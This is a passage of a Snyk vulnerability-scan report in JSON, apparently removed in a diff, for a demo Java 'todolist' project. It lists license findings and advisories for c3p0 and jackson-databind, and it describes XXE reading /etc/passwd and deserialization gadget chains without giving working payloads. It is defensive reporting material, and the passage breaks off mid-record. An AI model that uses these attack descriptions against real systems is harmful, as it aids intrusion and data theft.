"org.hibernate.javax.persistence:hibernate-jpa-2.1-api", - "version": "1.0.0.Final" - }, - { - "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", - "type": "license", - "title": "LGPL-2.0 license", - "semver": { - "vulnerable": [ - "[3.5.0.Beta-1, 5.3.1.Final)" - ] - }, - "license": "LGPL-2.0", - "language": "java", - "description": "LGPL-2.0 license", - "packageName": "org.hibernate:hibernate-entitymanager", - "creationTime": "2024-06-18T11:52:01.913Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T11:52:01.913Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-entitymanager@4.3.7.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.hibernate:hibernate-entitymanager", - "version": "4.3.7.Final" - 
}, - { - "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", - "type": "license", - "title": "LGPL-2.1 license", - "semver": { - "vulnerable": [ - "[3.0.1.GA, 3.1.2.GA)" - ] - }, - "license": "LGPL-2.1", - "language": "java", - "description": "LGPL-2.1 license", - "packageName": "org.jboss.logging:jboss-logging", - "creationTime": "2024-06-18T02:47:02.411Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:47:02.411Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-validator@4.3.1.Final", - "org.jboss.logging:jboss-logging@3.1.0.CR2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "org.jboss.logging:jboss-logging", - "version": "3.1.0.CR2" - } - ], - "ok": false, - "dependencyCount": 60, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": 
"high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "157 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": 
"2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - 
"packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "high" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - 
{ - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2798", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.263794Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.492797Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.721313Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", - "epssDetails": { - "percentile": "0.77013", - "probability": "0.00519", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24750" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-09-18T13:46:28.613692Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-18T13:44:12Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": 
"primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-09-18T16:19:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.721313Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Srikanth Ramu", - "threedr3am'follower" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2658", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", - "title": "GitHub PR" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:44.942188Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:55.201119Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", - "epssDetails": { - "percentile": "0.75677", - "probability": "0.00464", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10650" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-11-29T12:43:11.601162Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": 